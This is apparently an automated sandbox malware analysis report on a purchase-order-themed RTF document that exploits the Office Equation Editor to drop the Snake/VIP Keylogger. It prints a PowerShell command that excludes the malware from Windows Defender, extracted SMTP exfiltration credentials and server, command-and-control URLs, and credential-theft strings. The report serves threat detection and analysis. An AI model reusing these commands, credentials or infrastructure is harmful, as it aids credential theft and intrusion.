Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.doc

Overview

General Information

Sample name:PO.doc
Analysis ID:1528051
MD5:62d84deb859c9e770ed6ad64a236c9a2
SHA1:91b2c36414f3f9229a6b40066ed6d0a3d389d1df
SHA256:eaf823ff4d6112a7be24f15d8a3f0fda2512bfae97bc28e3713c7831e8bf5d8a
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3284 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3372 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obisfd.exe (PID: 3544 cmdline: "C:\Users\user\AppData\Roaming\obisfd.exe" MD5: 384AA6D3431E34610390EA4F6AA37A17)
        • powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • obisfd.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Roaming\obisfd.exe" MD5: 384AA6D3431E34610390EA4F6AA37A17)
    • EQNEDT32.EXE (PID: 3856 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "obilog@tonicables.top", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "obilog@tonicables.top", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PO.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x8e38:$obj2: \objdata
  • 0x8e52:$obj3: \objupdate
  • 0x8e14:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.obisfd.exe.39dd5c0.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.obisfd.exe.39dd5c0.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              5.2.obisfd.exe.39dd5c0.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.obisfd.exe.39dd5c0.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                5.2.obisfd.exe.39dd5c0.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3977d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 154.216.19.160, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3372, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3372, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3372, Protocol: tcp, SourceIp: 154.216.19.160, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", ParentImage: C:\Users\user\AppData\Roaming\obisfd.exe, ParentProcessId: 3544, ParentProcessName: obisfd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", ProcessId: 3620, ProcessName: powershell.exe
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obisfd.exe, NewProcessName: C:\Users\user\AppData\Roaming\obisfd.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obisfd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3372, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", ProcessId: 3544, ProcessName: obisfd.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obisfd.exe, NewProcessName: C:\Users\user\AppData\Roaming\obisfd.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obisfd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3372, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", ProcessId: 3544, ProcessName: obisfd.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", ParentImage: C:\Users\user\AppData\Roaming\obisfd.exe, ParentProcessId: 3544, ParentProcessName: obisfd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", ProcessId: 3620, ProcessName: powershell.exe
                Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\obisfd.exe, QueryName: checkip.dyndns.org
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3372, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obisfd.exe", ParentImage: C:\Users\user\AppData\Roaming\obisfd.exe, ParentProcessId: 3544, ParentProcessName: obisfd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obisfd.exe", ProcessId: 3620, ProcessName: powershell.exe
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Temp\afvoldkb.3oi.ps1

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:55:52.210553+020020220501A Network Trojan was detected154.216.19.16080192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:55:52.331885+020020220511A Network Trojan was detected154.216.19.16080192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:55:52.331885+020028274491Attempted User Privilege Gain154.216.19.16080192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:55:59.768019+020028033053Unknown Traffic192.168.2.2249166188.114.96.3443TCP
                2024-10-07T14:56:02.527569+020028033053Unknown Traffic192.168.2.2249168188.114.97.3443TCP
                2024-10-07T14:56:06.132319+020028033053Unknown Traffic192.168.2.2249174188.114.96.3443TCP
                2024-10-07T14:56:08.733630+020028033053Unknown Traffic192.168.2.2249176188.114.96.3443TCP
                2024-10-07T14:56:12.583444+020028033053Unknown Traffic192.168.2.2249180188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:55:58.208680+020028032742Potentially Bad Traffic192.168.2.2249164158.101.44.24280TCP
                2024-10-07T14:55:59.194589+020028032742Potentially Bad Traffic192.168.2.2249164158.101.44.24280TCP
                2024-10-07T14:56:02.093635+020028032742Potentially Bad Traffic192.168.2.2249167158.101.44.24280TCP
                2024-10-07T14:56:03.310460+020028032742Potentially Bad Traffic192.168.2.2249169158.101.44.24280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: PO.docAvira: detected
                Antivirus detection for URL or domain
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Found malware configuration
                Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "obilog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
                Source: 7.2.obisfd.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "obilog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: PO.docReversingLabs: Detection: 50%
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\obisfd.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 154.216.19.160 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obisfd.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obisfd.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
                Source: Binary string: kdcB.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmp, 6FfzLi8FyhIIqWu[1].exe.2.dr, obisfd.exe.2.dr
                Source: Binary string: kdcB.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmp, 6FfzLi8FyhIIqWu[1].exe.2.dr, obisfd.exe.2.dr

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030EB89h7_2_0030E8A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_003069B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00309743h7_2_00309330
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030767Dh7_2_00307490
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00308007h7_2_00307490
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00309181h7_2_00308EC2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030F4B9h7_2_0030F1D9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_003071C9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030FDE9h7_2_0030FB08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030F021h7_2_0030ED40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0030F951h7_2_0030F670
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00309743h7_2_00309672
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_00306FEA
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F85AAh7_2_004F82B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F98CAh7_2_004F95D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F0311h7_2_004F0040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F7111h7_2_004F6E40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F8F3Ah7_2_004F8C40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F4321h7_2_004F4050
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FE54Ah7_2_004FE250
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F2339h7_2_004F2068
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FCD62h7_2_004FCA68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F6349h7_2_004F6078
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F10D9h7_2_004F0E08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F7F7Ah7_2_004F7C08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F50E9h7_2_004F4E18
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FBF0Ah7_2_004FBC10
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FA722h7_2_004FA428
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FFD32h7_2_004FFA38
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F3101h7_2_004F2E30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F3599h7_2_004F32C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FDBBAh7_2_004FD8C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F07A9h7_2_004F04D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F75A9h7_2_004F72D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FC3D2h7_2_004FC0D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F47B9h7_2_004F44E8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FABEAh7_2_004FA8F0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FB57Ah7_2_004FB280
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F9D92h7_2_004F9A98
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FF3A2h7_2_004FF0A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F1571h7_2_004F12A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F5581h7_2_004F52B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F5A19h7_2_004F5748
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FBA42h7_2_004FB748
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F3A09h7_2_004F3760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FA25Ah7_2_004F9F60
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F8A72h7_2_004F8778
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F0C41h7_2_004F0970
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F7A41h7_2_004F7770
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FF86Ah7_2_004FF570
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F9402h7_2_004F9108
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F27D1h7_2_004F2500
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FEA12h7_2_004FE718
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F67E2h7_2_004F6510
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F1A09h7_2_004F1738
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FD22Ah7_2_004FCF30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F1EA1h7_2_004F1BD0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F5EB1h7_2_004F5BE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FEEDAh7_2_004FEBE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FD6F2h7_2_004FD3F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FE082h7_2_004FDD88
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F4C51h7_2_004F4980
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F2C69h7_2_004F2998
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F6C79h7_2_004F69A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FC89Ah7_2_004FC5A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004F3E89h7_2_004F3BB8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 004FB0B2h7_2_004FADB8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 0069033Ah7_2_00690040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 4x nop then jmp 00691B22h7_2_00691828
